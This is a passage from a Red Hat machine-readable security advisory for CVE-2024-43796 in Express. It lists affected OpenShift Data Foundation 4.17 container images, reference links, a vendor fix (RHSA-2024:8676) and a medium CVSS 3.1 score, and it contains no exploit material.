"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43796", }, { category: "external", summary: "RHBZ#2311152", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311152", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43796", url: "https://www.cve.org/CVERecord?id=CVE-2024-43796", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43796", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43796", }, { category: "external", summary: "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553", url: "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553", }, { category: "external", summary: "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx", url: "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx", }, ], release_date: "2024-09-10T15:15:17.510000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-30T14:25:22+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8676", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", 